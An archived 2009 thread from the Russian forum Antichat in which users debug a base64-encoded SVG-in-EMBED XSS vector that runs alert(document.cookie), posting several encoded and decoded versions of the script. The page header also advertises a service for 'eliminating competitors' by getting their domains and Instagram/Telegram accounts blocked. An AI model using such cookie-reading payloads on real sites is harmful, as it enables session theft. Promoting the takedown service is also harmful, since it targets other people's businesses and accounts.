УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Алерт и embed

Опции темы

Поиск в этой теме

Опции просмотра

Алерт и embed

14.03.2009, 14:31

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Отправить сообщение для wildshaman с помощью ICQ

Алерт и embed

Имется такой код:

Код:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgiQW50aUNoYXQiKTwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Вставляю его на сайт, он алертом выводит "AntiChat".
Меняю код на

Код:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Он должен алертом выводить куки, но выводит пустую строку, хотя куки точно есть. Что я делаю не так, как вывести куки?

14.03.2009, 14:54

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

У меня всё выводит:

2 вариант:
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>

1-м вариант:

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert("AntiChat")</script></svg>

вывод алерта по первому варианту:

txtMainTab=Timeline; chkSliderOptionsPanel=true

14.03.2009, 15:01

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Цитата:

Сообщение от Pashkela

У меня всё выводит:

просто

Код:

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>

у меня выводит куки, а мне надо запихать это в embed, как я и показал во втором варианте, но так, чтобы он куки показывал, а не пустую строку....

14.03.2009, 15:34

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Если зайти на любой сайт, где установлены куки, и ввести в поле для урла

Код:

data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9zdmc+

, то должен выскочить алерт с куками. А выскакивает пустой алерт =(
Всю голову уже поломал)

14.03.2009, 15:45

Deathdreams

Постоянный

Регистрация: 08.11.2008

Сообщений: 498

Провел на форуме:
2603363

Репутация: 278

Отправить сообщение для Deathdreams с помощью ICQ

попробуй поставь сразу,после:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
Pashkela правильно сказал,все выводит
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>

14.03.2009, 15:48

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Цитата:

Сообщение от Deathdreams

Да, если писать на страницу в раскодированном виде (как ты напсиал), то да, выводятся куки. А если закодировать и вставить в ембед (как мне надо) - то не выводятся куки. В этом-то и трабла!

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
использование тега embed для угона cookies ?	ickhz	Уязвимости	13	29.12.2008 17:05
Алерт есть. Как закодироровать сниф в String.fromCharCode.	m2infect	Форумы	2	30.06.2006 03:12
Баги на сайтах.	D1mOn	Уязвимости	295	27.06.2006 22:30
XSS в Gmail.ru (алерт в адресной книге)	_kREveDKo_	E-Mail	0	14.04.2006 22:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход